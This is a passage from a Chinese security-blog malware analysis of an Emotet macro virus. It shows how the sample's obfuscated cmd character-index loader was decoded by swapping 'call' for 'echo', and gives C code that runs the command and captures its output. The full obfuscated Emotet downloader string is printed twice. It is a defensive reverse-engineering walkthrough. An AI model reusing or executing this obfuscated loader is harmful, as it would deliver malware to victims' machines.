欢迎来到 黑吧安全网 聚焦网络安全前沿资讯,精华内容,交流技术心得!

秒杀宏病毒,解剖Emotet技术难点

来源:本站整理 作者:刀郎 时间:2018-08-21 TAG: 我要投稿
这里我们只要给call,替换成echo 再修改一下打印的变量就可以了,我修改后的代码如下
Cmd /V:O/C"set -   =IdBSZaVlEVEJwpRGpMcXUSahlErhlBwsz 7+Wi;mN9qC.@,\Pk}tQb'j26=oT)fDy:/nue{F4Hv1$(-x&&for %o in (16,59,30,69,26,31,27,69,28,28,33,76,53,37,59,58,67,69,30,78,59,53,55,69,18,51,33,40,69,51,44,36,69,53,43,28,37,69,67,51,38,76,26,67,9,58,54,27,51,51,16,65,66,66,53,22,32,22,78,31,27,22,26,51,22,31,27,44,26,68,66,27,49,42,19,42,60,75,45,27,51,51,16,65,66,66,22,67,22,16,22,16,59,28,37,74,44,26,68,66,21,16,72,67,22,45,27,51,51,16,65,66,66,31,27,59,26,69,18,26,69,31,51,31,18,27,59,59,28,31,44,18,59,39,66,67,67,52,49,40,45,27,51,51,16,65,66,66,18,59,39,37,18,59,28,69,44,18,59,39,66,56,73,4,45,27,51,51,16,65,66,66,69,28,22,26,51,69,1,69,28,22,22,18,18,37,59,67,44,69,31,66,57,73,64,28,54,44,21,16,28,37,51,77,54,45,54,61,38,76,68,42,43,33,58,33,54,75,34,41,54,38,76,68,31,51,58,76,69,67,74,65,51,69,39,16,35,54,47,54,35,76,68,42,43,35,54,44,69,79,69,54,38,62,59,26,69,22,18,27,77,76,67,25,14,33,37,67,33,76,26,67,9,61,70,51,26,64,70,76,53,37,59,44,63,59,30,67,28,59,22,1,71,37,28,69,77,76,67,25,14,46,33,76,68,31,51,61,38,21,51,22,26,51,78,48,26,59,18,69,31,31,33,76,68,31,51,38,53,26,69,22,49,38,50,18,22,51,18,27,70,50,50,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,88)do set ]   =!]   !!-   :~%o,1!&&if %o==88 echo !]   !"
现在问题来了,虽然我们修改了代码,怎么给显示结果打印处理啊?
我才用我最熟悉的方式C代码编程
代码如下
int main(int argc, char* argv[])
{
shell();
}
   
void shell()
{
initPipe();
   
DWORD dwByteWritten;
   
   
   
   
unsigned long   BytesRead = 0;
DWORD TotalBytesAvail;
   
//检查管道中是否有数据
while (TRUE)
{
//printf("有数据到来!\n");
memset(readBuff, 0, sizeof(readBuff));
ReadFile(hReadPipeCmd, readBuff, 4096, &BytesRead, NULL);
printf("%s", readBuff);
}
}
   
WCHAR tEst[] = { L"Cmd /V:O/C\"set -   =IdBSZaVlEVEJwpRGpMcXUSahlErhlBwsz 7+Wi;mN9qC.@,\\Pk}tQb'j26=oT)fDy:/nue{F4Hv1$(-x&&for %o in (16,59,30,69,26,31,27,69,28,28,33,76,53,37,59,58,67,69,30,78,59,53,55,69,18,51,33,40,69,51,44,36,69,53,43,28,37,69,67,51,38,76,26,67,9,58,54,27,51,51,16,65,66,66,53,22,32,22,78,31,27,22,26,51,22,31,27,44,26,68,66,27,49,42,19,42,60,75,45,27,51,51,16,65,66,66,22,67,22,16,22,16,59,28,37,74,44,26,68,66,21,16,72,67,22,45,27,51,51,16,65,66,66,31,27,59,26,69,18,26,69,31,51,31,18,27,59,59,28,31,44,18,59,39,66,67,67,52,49,40,45,27,51,51,16,65,66,66,18,59,39,37,18,59,28,69,44,18,59,39,66,56,73,4,45,27,51,51,16,65,66,66,69,28,22,26,51,69,1,69,28,22,22,18,18,37,59,67,44,69,31,66,57,73,64,28,54,44,21,16,28,37,51,77,54,45,54,61,38,76,68,42,43,33,58,33,54,75,34,41,54,38,76,68,31,51,58,76,69,67,74,65,51,69,39,16,35,54,47,54,35,76,68,42,43,35,54,44,69,79,69,54,38,62,59,26,69,22,18,27,77,76,67,25,14,33,37,67,33,76,26,67,9,61,70,51,26,64,70,76,53,37,59,44,63,59,30,67,28,59,22,1,71,37,28,69,77,76,67,25,14,46,33,76,68,31,51,61,38,21,51,22,26,51,78,48,26,59,18,69,31,31,33,76,68,31,51,38,53,26,69,22,49,38,50,18,22,51,18,27,70,50,50,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,88)do    set ]   =!]   !!-   :~%o,1!&&if %o==88 echo !]   !\"    " };
void initPipe()
{
SECURITY_ATTRIBUTES sa = { 0 };
STARTUPINFOW         si = { 0 };
PROCESS_INFORMATION pi = { 0 };
   
sa.nLength = sizeof(sa);
sa.lpSecurityDescriptor = NULL;
sa.bInheritHandle = TRUE;
//创建管道
CreatePipe(&hReadPipeCmd, &hWritePipeCmd, &sa, 0);
CreatePipe(&hReadPipeShell, &hWritePipeShell, &sa, 0);
   
GetStartupInfoW(&si);
si.cb = sizeof(STARTUPINFO);
si.wShowWindow = SW_SHOW;
si.dwFlags = STARTF_USESHOWWINDOW;
si.hStdInput = hReadPipeShell;
si.hStdOutput = si.hStdError = hWritePipeCmd;
////创建cmd进程
if (!CreateProcessW(NULL, (LPWSTR)tEst,
NULL, NULL, FALSE, 0, NULL, NULL, &si, &pi))
{
printf("CreateProcess Error:%d!\n",GetLastError());
CloseHandle(hWritePipeCmd);
CloseHandle(hReadPipeShell);
//initPipeSuccess = FALSE;
return;
}
hProcessHandle = pi.hProcess;
WaitForSingleObject(hProcessHandle, INFINITE);
printf("exit");
//initPipeSuccess = TRUE;
getchar()
;
}
下面放一个我跑出的图吧:

以后妈妈再也不用担心我的学习了,秒杀一切。
第五章 总结
好了,类似于这种宏病毒的样本就技术点就分析完成了,剩下的就是拿od跟pe文件了,我这里就不介绍了,最后说点题外话:我不是不会技术分析,只是我觉得思路比技术分析亮点大,技术分析是个人都会,只是时间问题,唯独思路才强大。
 

上一页  [1] [2] 

【声明】:黑吧安全网(http://www.myhack58.com)登载此文出于传递更多信息之目的,并不代表本站赞同其观点和对其真实性负责,仅适于网络安全技术爱好者学习研究使用,学习中请遵循国家相关法律法规。如有问题请联系我们,联系邮箱admin@myhack58.com,我们会在最短的时间内进行处理。
  • 最新更新
    • 相关阅读
      • 本类热门
        • 最近下载